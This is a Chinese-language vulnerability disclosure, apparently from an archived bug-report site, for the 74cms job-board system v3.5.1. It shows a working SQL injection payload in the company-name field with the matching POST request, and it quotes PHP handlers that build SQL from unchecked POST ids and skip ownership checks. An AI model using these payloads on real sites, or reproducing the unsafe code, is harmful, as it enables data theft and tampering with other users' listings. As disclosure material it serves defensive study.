### 简要描述:
骑士人才系统 2处越权+1处sql注入获取敏感信息
### 详细说明:
这里我就不做代码分析了,直接看我操作
第一步,我们首先注册一个正常的企业用户
第二步,我们修改企业用户的信息
[<img src="https://images.seebug.org/upload/201410/2017122933dc98fe143d568c7e817b1e50bf691e.png" alt="16.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201410/2017122933dc98fe143d568c7e817b1e50bf691e.png)
公司名称',`jobs_name`=user() #-- sdd
然后我们访问url:
POST /74cms_v3.5.1_20141015https://images.seebug.org/upload/wap/company/wap_company_jobs.php?act=jobs_edit_save HTTP/1.1
Host: localhost
postdata:
id=1&add_mode=1&days=0&jobs_name=xxxxx&nature=62&nature_cn=xxxx&topclass=1&category=4&subclass=569&category_cn=xxxxx&amount=111&district=4&sdistrict=93&district_cn=xxxxx&wage=58&wage_cn=2000~3000xxxx&sex=1&sex_cn=%E7%94%B7&education=69&education_cn=xxxx&experience=75&experience_cn=xxxx&graduate=0&contents=xxxxxxxxxxxxxx&contact=xxxxxxxxxxxxxx&telephone=029-88164598
查看发布的职位信息:
[<img src="https://images.seebug.org/upload/201410/20171347e608cb48d67d77af7cdf05cb5fd8aeaf.png" alt="17.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201410/20171347e608cb48d67d77af7cdf05cb5fd8aeaf.png)
下来我们看越权处:
第一处:
没有参与uid计算
wap_company_jobs.php:
```
// 暂停 职位
elseif($act=="jobs_pause")
{
//越权
$smarty->cache = false;
$id=$_POST['id'];
$sql="update ".table("jobs")." set display=2 where id=$id";
$db->query($sql)?exit("ok"):exit("err");
}
```
第二处:
```
elseif($act=="jobs_regain")
{
$smarty->cache = false;
$id=$_POST['id'];
//越权
$sql="update ".table("jobs")." set display=1 where id=$id";
$db->query($sql)?exit("ok"):exit("err");
}
```
### 漏洞证明:
暂无评论